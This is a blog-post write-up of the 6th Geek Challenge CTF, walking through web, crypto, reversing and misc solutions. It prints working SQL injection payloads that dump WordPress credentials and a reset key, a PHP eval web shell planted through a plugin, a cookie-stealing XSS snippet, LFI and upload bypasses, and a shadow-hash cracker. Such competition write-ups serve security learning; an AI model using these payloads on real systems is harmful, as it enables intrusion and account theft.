The 6th Geek Challenge (极客大挑战) writeup

web500

Challenge: 柠檬牛 took on a project and reportedly finished it in ten minutes. Can you? http://hackme.sycsec.com

Visiting http://hackme.sycsec.com shows a Discuz! 7.2 installation, whose faq.php has a known SQL injection (http://www.waitalone.cn/discuz72-faq-exp.html has an exploit tool for it). The payload below is the classic count(*) / floor(rand(0)*2) / GROUP BY trick: whatever concat() selects comes back inside MySQL's "Duplicate entry" error message. First, enumerate the schemas to find the WordPress database, bumping the LIMIT offset (2,1 selects the third schema) to walk through them:

```
POST http://hackme.sycsec.com/faq.php

action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat((select distinct table_schema from information_schema.tables limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#
```

With the same technique, dump the rows of wp_users in the wordpress database (again stepping the LIMIT offset to read one row at a time):

```
action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat((select concat(id,user_login,user_pass,0x20,user_status,0x20,user_nicename,0x20,user_email,0x20,user_activation_key) from wordpress.wp_users limit 1,1 ),floor(rand(0)*2))x from information_schema.tables group by x)a)#
```

This yields admin's row:

```
admin $P$BIB5534oip5rzWrS2u76LJIoWaMetP/ 0 admin sycweb3@163.com
```

The question is how to turn this data into a login to the admin panel. Instead of cracking the phpass ($P$) hash, there is a way to reset admin's password through user_activation_key:

http://www.ilovtina.com/2014/01/03/sql_injection/

First click "Lost your password?" so that WordPress generates a fresh key for admin, then inject again to read user_activation_key (hex-encoded so that the error message returns it intact). This works here because this WordPress version stores the key in plain text; WordPress 4.3 and later store a salted hash of it, and this step would only leak the hash.

```
action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat((select concat(id,user_email,0x20,hex(user_activation_key),0x20) from wordpress.wp_users limit 0,1 ),floor(rand(0)*2))x from information_schema.tables group by x)a)#
```

Returned data:

```
Error: Duplicate entry '1sycweb3@163.com 7136775859785A39716B74765968674567563950 1' for key 'group_key'
```

Decoding the hex gives the activation key q6wXYxZ9qktvYhgEgV9P. Assemble the reset URL:

```
wp-login.php?action=rp&key=q6wXYxZ9qktvYhgEgV9P&login=admin
```

Visiting it lets us set a new password for admin.

After logging in to the admin panel, edit the Akismet plugin to get a shell.

```
Edit akismet/akismet.php and add the line that writes the shell:
fputs(fopen('./angelshell.php',"w"),'<?php eval($_POST[\'chopper123\']);?>');

Then request http://hackme.sycsec.com/blog/wp-content/plugins/akismet/akismet.php once so the plugin file runs and drops the shell:
URL:      http://hackme.sycsec.com/blog/wp-content/plugins/akismet/angelshell.php
Password: chopper123
```

Now connect with 菜刀 (China Chopper). The flag is in the web root. I did not figure out how to go further from here.

Clover Guestbook (三叶草留言板)

Challenge: It's more fun when you can't see it, come and try blind XSS! ps: a little filtering was added. http://web1.sycsec.com/e1f29a7ed5acf42fba22c758cb20ed6c/

Later a test program was provided:

```
Input:   <script src=123 />
The filter rewrites src to 0:
Output:  <script 0=123 />
```

A simple PoC with location.href is enough (the receiver only sees the cookie if document.cookie is appended to the URL, for example as a query string):

```
<script>location.href='your xss receiver url'</script>
```

That captures the admin's cookie; log in to the backend with it and get the flag.

Bypass_it

http://upload.sycsec.com/

Upload a file with a .php5 extension to get the flag. The extension blacklist misses alternative extensions (.php5, .phtml and the like) that the server's handler mapping still passes to PHP.

sqli2

This one tests wide-byte (GBK) injection: %aa is a valid GBK lead byte, so it swallows the escaping backslash (%5c) that the filter puts in front of the single quote, and the quote is free again. See http://www.jinglingshu.org/?p=534.

```
http://sql.sycsec.com/f8077f08525d33bd7f0b1fd98b53dc59/?uid=1%aa'  union all select key_flag from `[key_flag]`%20%23
```

sqli3

  • order by 报错注入 http://joychou.org/index.php/web/SQL-Injections-in-MySQL-LIMIT-clause.html

  • 简单的绕过过滤. 空格用注释/**/代替

    报错注入出数据库名:
    http://sql.sycsec.com/d07127c7c9267637d554c3f79e1ee203/?lalala=1/*asdf*/PROCEDURE/*asdf*/analyse(extractvalue(rand(),concat(0x3a,database())),1)%23
    XPATH syntax error: ':rgvk8278b4utx6ei'
    
    报错注入出表名:
    http://sql.sycsec.com/d07127c7c9267637d554c3f79e1ee203/?lalala=1/*asdf*/PROCEDURE/*asdf*/analyse(extractvalue(rand(),concat(0x3a,(select/*asdf*/table_name/*asdf*/from/*asdf*/information_schema.tables/*asdf*/where/*asdf*/table_schema='rgvk8278b4utx6ei'/*asdf*/limit/*asdf*/0,1))),1)%23
    XPATH syntax error: ':#flag_this'
    
    报错注入出flag:
    http://sql.sycsec.com/d07127c7c9267637d554c3f79e1ee203/?lalala=1/*asdf*/PROCEDURE/*asdf*/analyse(extractvalue(rand(),concat(0x3a,(select/*asdf*/flag/*asdf*/from/*asdf*/`%23flag_this`))),1)%23

Xiaoming (小明)

Challenge: http://web1.sycsec.com/d900342ce35a24bca80c965e4380056f/ Xiaoming? Yes, teacher? Get out.

PHP LFI: read the page source through the php://filter wrapper, which base64-encodes the file instead of executing it:

```
php://filter/read=convert.base64-encode/resource=<file name>

http://web1.sycsec.com/d900342ce35a24bca80c965e4380056f/include.php?file=php://filter/read=convert.base64-encode/resource=README.php
```

The Lost Password (遗失的密码)

Challenge: http://geek.sycsec.com/download/linux/l718f4a7c8c81b0bc4f48f7f869e1ac7.html
We popped a server; from the information gathered, the admin joker likes passwords of the form username+date. Help me find the password (the flag is SYC{password}).

```
root:$6$F84utBXh$g2dDb6QXacuId.5NDwrvyPxIJGxiU8gyhTywRP5jksb6e/CgeG94/THLJhgZ4oB8hPowrLPdmVWFIZTBZdT6S/:16680:0:99999:7:::
```

The approach is to brute-force this Linux password. A quick look at the shadow format (http://www.berlinix.com/linux/shadow.php): $6$ means SHA-512 crypt, F84utBXh is the salt, and the third field, 16680, is the last password change in days since 1970-01-01, i.e. 2015-09-02, so dates after that are not worth trying. Python's built-in crypt module does the hashing:

```python
import crypt
from datetime import date, timedelta

# the hash from the shadow entry; "$6$F84utBXh$" is the salt argument crypt() wants
target = "$6$F84utBXh$g2dDb6QXacuId.5NDwrvyPxIJGxiU8gyhTywRP5jksb6e/CgeG94/THLJhgZ4oB8hPowrLPdmVWFIZTBZdT6S/"
salt = "$6$F84utBXh$"

# every day from 1940-01-01 up to the challenge date
a = date(1940, 1, 1)
b = date(2015, 10, 30)

dt = a
while dt <= b:
    passwd = "joker" + dt.strftime("%Y%m%d")
    crypted = crypt.crypt(passwd, salt)
    print(passwd, crypted)
    if crypted == target:
        print("success:", passwd)
        break
    dt += timedelta(days=1)
```
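As an added example that is not part of the original writeup: parse the shadow entry first instead of pasting the salt by hand, and use the last-change field to bound the date range. The function names are my own; crypt is optional because it was removed from the standard library in Python 3.13, and parsing and candidate generation work without it.

```python
import re
from datetime import date, timedelta

try:
    import crypt                  # standard library up to Python 3.12, removed in 3.13
except ImportError:
    crypt = None                  # parsing and candidate generation still work

EPOCH = date(1970, 1, 1)

def date_from_days(days):
    """shadow stores dates as a day count since 1970-01-01."""
    return EPOCH + timedelta(days=int(days))

def parse_shadow(line):
    """Split one /etc/shadow entry (user:$id$salt$hash:lastchg:...) into the
    pieces crypt() needs plus the last-change date.
    Assumption: no rounds= prefix in the hash field."""
    fields = line.strip().split(":")
    user, hashed, lastchg = fields[0], fields[1], fields[2]
    m = re.match(r"^\$(\w+)\$([^$]+)\$[^$]+$", hashed)
    if m is None:
        raise ValueError("unsupported hash format: %r" % hashed)
    method, salt = m.group(1), m.group(2)
    return {
        "user": user,
        "hash": hashed,
        "method": method,                      # "6" = SHA-512, "5" = SHA-256, "1" = MD5 crypt
        "salt": "$%s$%s$" % (method, salt),    # second argument for crypt.crypt()
        "lastchg": date_from_days(lastchg),
    }

def candidates(username, start, end):
    """username + YYYYMMDD for every day from start to end, inclusive."""
    dt = start
    while dt <= end:
        yield username + dt.strftime("%Y%m%d")
        dt += timedelta(days=1)

def crack(line, username, start):
    """Try username+date passwords against the entry. The search stops at the
    last-change date (assumption: the date in the password is not later than
    the day it was set). Returns the password, or None if nothing matched or
    the crypt module is unavailable."""
    entry = parse_shadow(line)
    if crypt is None:
        return None
    for pw in candidates(username, start, entry["lastchg"]):
        if crypt.crypt(pw, entry["salt"]) == entry["hash"]:
            return pw
    return None

# the entry from the challenge
SHADOW_LINE = ("root:$6$F84utBXh$g2dDb6QXacuId.5NDwrvyPxIJGxiU8gyhTywRP5jksb6e/"
               "CgeG94/THLJhgZ4oB8hPowrLPdmVWFIZTBZdT6S/:16680:0:99999:7:::")

if __name__ == "__main__":
    entry = parse_shadow(SHADOW_LINE)
    print(entry["method"], entry["salt"], entry["lastchg"])
    print(crack(SHADOW_LINE, "joker", date(1940, 1, 1)))
```

SHA-512 crypt runs 5000 rounds per guess by default, so a few tens of thousands of candidates take minutes in pure Python; for anything larger hand the entry to john or hashcat.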

The Vanished Flag (消失的flag)

Challenge: http://geek.sycsec.com/download/program/program200/bb90845ac4be58ac811afb22360ea3d8.html

The goddess accidentally rm'ed her password, but being clever she had already given the checksums of the flag, split into segments, to her backup boyfriend in the cloud. You cracked her wifi and, while running a man-in-the-middle attack, captured the traffic he sent her, which contains five PNG images. Can you recover the flag?

With Wireshark (Follow TCP Stream) and WinHex, the five images can be carved out of the capture. They show checksums. Working out what they mean: each is a CRC32, and the task is to invert it back to 4 bytes (4 ASCII characters) of content. After a long search, the bit-by-bit CRC32 implementation posted on php.net turned out to be the key. After studying how CRC32 works, the following code came out of it, PHP being the best language after all:

```php
<?php
// Bit-by-bit CRC32 from php.net; $first_call resets the register so the
// function can be fed a string in successive blocks.
function bitbybit_crc32($str, $first_call = false) {
    // reflection of the CRC32 polynomial 0x04C11DB7
    $poly_reflected = 0xEDB88320;

    static $reg = 0xFFFFFFFF;              // register value survives between calls
    if ($first_call) $reg = 0xFFFFFFFF;

    $n = strlen($str);
    $zeros = $n < 4 ? $n : 4;

    // xor the first min(4, strlen($str)) bytes straight into the register
    for ($i = 0; $i < $zeros; $i++)
        $reg ^= ord($str[$i]) << $i * 8;

    // feed the remaining bytes one bit at a time
    for ($i = 4; $i < $n; $i++) {
        $next_char = ord($str[$i]);
        for ($j = 0; $j < 8; $j++)
            $reg = (($reg >> 1 & 0x7FFFFFFF) | ($next_char >> $j & 1) << 0x1F)
                 ^ ($reg & 1) * $poly_reflected;
    }

    // flush: shift in enough zero bits to push the data through the register
    for ($i = 0; $i < $zeros * 8; $i++)
        $reg = ($reg >> 1 & 0x7FFFFFFF) ^ ($reg & 1) * $poly_reflected;

    // final xor with 0xFFFFFFFF (masked so 64-bit PHP does not return a negative)
    return ~$reg & 0xFFFFFFFF;
}

// Reverse of the above for one 4-byte block: undo the final xor, run the 32
// flush shifts backwards, then undo the initial xor with 0xFFFFFFFF.
function bitbybit_crc32_reverse($crc) {
    $poly_reflected = 0xEDB88320;
    $reg = ~$crc & 0xFFFFFFFF;

    for ($i = 0; $i < 32; $i++) {
        // the polynomial's top bit is set, so bit 31 of the shifted register
        // records whether the feedback xor happened in the forward step
        if (($reg >> 31) & 1)
            $reg = ((($reg ^ $poly_reflected) << 1) | 1) & 0xFFFFFFFF;
        else
            $reg = ($reg << 1) & 0xFFFFFFFF;
    }
    return ~$reg & 0xFFFFFFFF;             // the 4 bytes, least significant byte first
}

// print the 4 recovered bytes in message order
function print_block($data) {
    for ($i = 0; $i < 4; $i++)
        echo chr(($data >> 8 * $i) & 0xFF);
    echo "\n";
}

// sanity check: forward CRC of a known block
$crc = bitbybit_crc32("cRc3", true);
printf("%08x\n", $crc);

// the four CRC32 values read from the images
foreach ([0x96ef245d, 0xe10baad1, 0x082ee868, 0x64af8482] as $crc) {
    $block = bitbybit_crc32_reverse($crc);
    printf("%08x ", $block);
    print_block($block);
}
?>
```

Collecting the results (CRC32 from the image, the second checksum shown in the image, the recovered block as a little-endian integer, and the same bytes as text):

```
96ef245d  138561fb21cde19596a9cd0ee487458c6716f59a  33635263  cRc3
e10baad1  73e490e57bbeaa21c92175048151c15c18cf6e6f  30435f32  2_C0
082ee868  eb74e94271a227b241c4d631c2e98367281a4058  7369316c  l1is
64af8482  978c3eec59bea942ed8b619c33544a8e5759db27  7d4e6f69  ioN}
```

SYC{cRc32_C0l1isioN}
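The same reversal in Python, as an added example that is not part of the original writeup. It runs the CRC-32 shift register backwards over the 32 flush steps. Because the register update is linear, the identical routine also computes the 4 bytes that must be appended to any prefix to force a chosen CRC (CRC forging), which goes beyond the single-block case the challenge needed. Function names are mine; zlib.crc32 serves only as the reference for checking.

```python
import zlib

POLY = 0xEDB88320          # reflected CRC-32 (IEEE) polynomial
MASK = 0xFFFFFFFF

def shift(reg):
    """One forward step of the CRC register with no new input bit."""
    return (reg >> 1) ^ (POLY if reg & 1 else 0)

def unshift(reg):
    """Inverse of shift(). POLY has bit 31 set and reg >> 1 never does, so
    bit 31 of the shifted value records whether the feedback xor happened."""
    if reg >> 31:
        return (((reg ^ POLY) << 1) | 1) & MASK
    return (reg << 1) & MASK

def crc32_block(prefix_crc, block):
    """Forward reference: CRC after appending 4 bytes to data whose CRC is
    prefix_crc. Xor the whole block in, then 32 shifts; by linearity this is
    the same as the usual byte-at-a-time algorithm."""
    reg = (prefix_crc ^ MASK) ^ int.from_bytes(block, "little")
    for _ in range(32):
        reg = shift(reg)
    return reg ^ MASK

def forge_tail(prefix_crc, target_crc):
    """Return the 4 bytes t with crc32(prefix + t) == target_crc, given
    prefix_crc == crc32(prefix). Runs crc32_block() backwards."""
    reg = target_crc ^ MASK
    for _ in range(32):
        reg = unshift(reg)
    block = reg ^ (prefix_crc ^ MASK)
    return block.to_bytes(4, "little")

def recover_block(crc):
    """The challenge case: a lone 4-byte message; crc32(b'') == 0."""
    return forge_tail(0, crc)

def flag_from_crcs(crcs):
    return "".join(recover_block(c).decode("latin-1") for c in crcs)

def reference_crc(data):
    """zlib's CRC-32, for cross-checking."""
    return zlib.crc32(data) & MASK

if __name__ == "__main__":
    # the four CRC-32 values read from the images in the challenge
    crcs = [0x96ef245d, 0xe10baad1, 0x082ee868, 0x64af8482]
    for c in crcs:
        blk = recover_block(c)
        print("%08x -> %r (check: %08x)" % (c, blk, reference_crc(blk)))
    print("SYC{" + flag_from_crcs(crcs))
```

The inverse is exact only because the message is as wide as the register: any longer message has 2^(8n-32) preimages per CRC, which is why a CRC is a checksum and not a hash.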

Transposition cipher

Full text at http://geek.sycsec.com/download/program/program100/Transposition_cipher.html
In classical cryptography the Caesar, Playfair, Hill and Vigenère ciphers are all substitution ciphers. A very different approach permutes the plaintext instead; such a cipher is called a transposition cipher.

The simplest example is the rail fence cipher: write the plaintext along diagonals and read it off row by row. With a depth of 2, "meet me after the toga party" is written as

```
m e m a t r h t g p r y
 e t e f e t e o a a t
```

and the ciphertext is MEMATRHTGPRYETEFETEOAAT.
This is trivial for a cryptanalyst. A more complex scheme writes the message row by row into a rectangle and reads it out column by column, with the column order scrambled; the column order is the key. For example (underscores mark spaces, which are part of the plaintext):

```
key:       4 3 1 2 5 6 7
plaintext: a t t a c k _
           p o s t p o n
           e _ u n t i l
           _ t w o _ x y

ciphertext: tsuwatnoto tape cpt koix nly
```

Now the question: on August 20, 2015 the goddess received a letter from a programmer (download link in the challenge). He told her it was encrypted with the complex scheme above and that the key is 7, 6, 5, 2, 1, 3, 4. Can you help her decrypt it? Will the poor programmer's confession succeed?

A simple decryption program (it assumes every column has the same height, i.e. the ciphertext length is a multiple of the key length, which holds for the example above):

```python
__author__ = 'angelwhu'

import sys


def gen_matrix(rows, cols):
    return [[''] * cols for _ in range(rows)]


def decode(chars, key):
    # key[j] is the column index of the j-th column read out during encryption
    cols = len(key)
    rows = -(-len(chars) // cols)          # ceil division
    matrix = gen_matrix(rows, cols)
    i = 0
    for char in chars:
        row = i % rows
        col = key[i // rows]
        matrix[row][col] = char
        i += 1
    for i in range(rows):
        for j in range(cols):
            sys.stdout.write(str(matrix[i][j]))


def test():
    chars = 'tsuwatnoto tape cpt koix nly'
    key_orig = [4, 3, 1, 2, 5, 6, 7]
    key = [2, 3, 1, 0, 4, 5, 6]       # key[j] = key_orig.index(j + 1)
    decode(chars, key)


def go():
    key_orig = [7, 6, 5, 2, 1, 3, 4]
    key = [4, 3, 5, 6, 2, 1, 0]       # key[j] = key_orig.index(j + 1)
    with open('ciphertext.txt') as f:
        chars = f.read()
    decode(chars, key)


if __name__ == '__main__':
    go()
```
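As an added example that is not part of the original writeup: the general columnar transposition, both directions, for a ciphertext of any length. When the last row is incomplete the columns have different heights, so the decryptor has to slice the ciphertext by column height rather than by a fixed block size. The key is taken directly in the page's notation (the rank of each column), and the function names are mine.

```python
def read_order(key):
    """key[c] is the rank of column c (the page's notation 4 3 1 2 5 6 7).
    Return the column indices in the order they are read out, rank 1 first."""
    return [key.index(rank) for rank in range(1, len(key) + 1)]

def column_heights(length, ncols):
    """Filling row by row leaves the first (length % ncols) columns one
    character taller than the others."""
    full, extra = divmod(length, ncols)
    return [full + (1 if c < extra else 0) for c in range(ncols)]

def encrypt(plaintext, key):
    """Write row by row, read column by column in key order."""
    ncols = len(key)
    rows = [plaintext[i:i + ncols] for i in range(0, len(plaintext), ncols)]
    return "".join(
        "".join(row[c] for row in rows if c < len(row))
        for c in read_order(key)
    )

def decrypt(ciphertext, key):
    """Cut the ciphertext into columns of the right heights, put each column
    back at its index, then read the grid row by row."""
    ncols = len(key)
    heights = column_heights(len(ciphertext), ncols)
    columns = [""] * ncols
    pos = 0
    for c in read_order(key):
        columns[c] = ciphertext[pos:pos + heights[c]]
        pos += heights[c]
    return "".join(
        columns[c][r]
        for r in range(max(heights))
        for c in range(ncols)
        if r < len(columns[c])
    )

if __name__ == "__main__":
    key = [4, 3, 1, 2, 5, 6, 7]
    print(decrypt("tsuwatnoto tape cpt koix nly", key))
    # the challenge: key 7 6 5 2 1 3 4 and the letter saved as ciphertext.txt
    # with open("ciphertext.txt") as f:
    #     print(decrypt(f.read(), [7, 6, 5, 2, 1, 3, 4]))
```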

The Rich Man's Password (土豪的密码)

http://geek.sycsec.com/download/program/program250/9b487a999aaa807d77305aac9d09f059.html

The encryption program is as follows (an affine cipher over the 96 code points from space upward):

```python
plain = 'this is the plaintext'
cipher = ''
for i in plain:
    cipher += chr((7 * (ord(i) - 32) + 25) % 96 + 32)
print(cipher.encode().hex())

# the ciphertext given by the challenge:
# *PI.^oar[JQ >%IIt"{<rHrP
```

A simple program to reverse it (for each character, add multiples of 96 until the value is divisible by 7; since 7 and 96 are coprime this takes at most 7 steps):

```python
def bit_decrypt():
    chars = '*PI.^oar[JQ >%IIt"{<rHrP'
    res = ''
    for c in chars:
        tmp = ord(c) - 32
        if tmp - 25 < 0:
            i = 1
        else:
            i = 0

        original = tmp + 96 * i - 25
        while original % 7 != 0:
            i = i + 1
            original = tmp + 96 * i - 25

        res += chr(original // 7 + 32)

    print(res)
    return res


if __name__ == '__main__':
    bit_decrypt()
```
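As an added example that is not part of the original writeup: the closed-form decryption multiplies by the modular inverse of 7 mod 96 (which is 55, since 7*55 = 385 = 4*96 + 1) instead of searching, and a small known-plaintext attack recovers the key (a, b) when it is not given. Function names are mine.

```python
from math import gcd

A, B = 7, 25            # the challenge's key: c = (7*(p-32) + 25) % 96 + 32
M, OFFSET = 96, 32      # alphabet: the 96 code points from space (32) upward

def affine_encrypt(plain, a=A, b=B):
    return "".join(chr((a * (ord(ch) - OFFSET) + b) % M + OFFSET) for ch in plain)

def affine_decrypt(cipher, a=A, b=B):
    """p = a^-1 * (c - b) mod M. pow(a, -1, M) raises ValueError when
    gcd(a, M) != 1, i.e. when the key is not invertible; 7 and 96 are coprime."""
    a_inv = pow(a, -1, M)
    return "".join(chr((a_inv * (ord(ch) - OFFSET - b)) % M + OFFSET) for ch in cipher)

def recover_key(pairs):
    """Known-plaintext attack: every (a, b) consistent with the given
    (plaintext char, ciphertext char) pairs. Only invertible a are candidates;
    two pairs whose plaintext difference is coprime to M pin the key down."""
    keys = []
    for a in range(1, M):
        if gcd(a, M) != 1:
            continue
        for b in range(M):
            if all(affine_encrypt(p, a, b) == c for p, c in pairs):
                keys.append((a, b))
    return keys

if __name__ == "__main__":
    given = '*PI.^oar[JQ >%IIt"{<rHrP'    # the ciphertext from the challenge
    print(affine_decrypt(given))
```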

Is your hand speed fast enough? (手速够不够快?)

Challenge: Come and see whether years of training made your hands fast enough. nc 222.18.158.229 30002

This is a simple socket exercise: the service sends base64 and expects the decoded text back. Keep sending the decoded results; after many tweaks it worked.

```python
__author__ = 'angelwhu'

import socket
import base64

port = 1235
ip = '222.18.158.229'
buf = 102400


def get_result(data):
    return base64.b64decode(data)


if __name__ == '__main__':
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((ip, port))
    round_no = 1
    data = b''

    while True:
        input_data = sock.recv(buf)
        if not input_data:
            break
        print(str(round_no) + ': \n' + input_data.decode(errors='replace'))
        if round_no > 1:
            lines = input_data.split(b'\n')
            if round_no == 2:
                data = lines[2]          # the first challenge is on the third line
                print(data)
            if round_no % 2 == 1:
                data = lines[0]          # later challenges arrive on the first line
                print(data)
            if round_no % 2 == 0:
                res = get_result(data.strip())
                print(res)
                sock.send(res)
        round_no += 1
    sock.close()
```

Can you write code? (会不会写代码?)

Challenge: Can you write code? A flag is said to be hidden inside (syc must be upper case). http://geek.sycsec.com/download/misc/gbab7854e8c894a53c456d6da30bec68

The download is a zip file. Extracting it with WinRAR shows a git repository; use git to inspect the history and go back to the commit that still had the flag (git show <commit> would display it without rewriting the working tree):

```
git log
git reset --hard d7adbc321c253a2097e5ba1b0ea7fa489fb4c468
```

At the commit that contains the flag, read it off.

Simple Win_RE (简单Win_RE)

Challenge: http://geek.sycsec.com/download/re/win/Re100.exe A simple RE.

Simple XOR logic with the byte order swapped.

Simple Linux reversing (简单的linux逆向)

Challenge: http://geek.sycsec.com/download/re/linux/cm1 A very, very simple Linux crackme!! Wrap the flag in SYC{} before submitting :)

The string E`1z[F1fkbUFiRFnftMUa{ can be found in the binary.

The program then applies a logical transform to the input and compares the result with it:

So easy (好简单啊)

Challenge: http://geek.sycsec.com/download/re/win/easy Hahaha... this one really is easy, just have fun :)

Open it in IDA, find the logic, and compute the flag by hand.

```
SYC{1341910478870402}
```

Summary

Final score: 4300 points, and a lot learned. This was my best result so far; keep going!

Author: angelwhu
Link: https://www.angelwhu.com/paper/2015/11/02/the-sixth-geek-big-challenge-writeup/
License: Unless stated otherwise, all articles on this blog are licensed under CC BY-NC-SA 4.0. Please credit angelwhu_blog when reposting.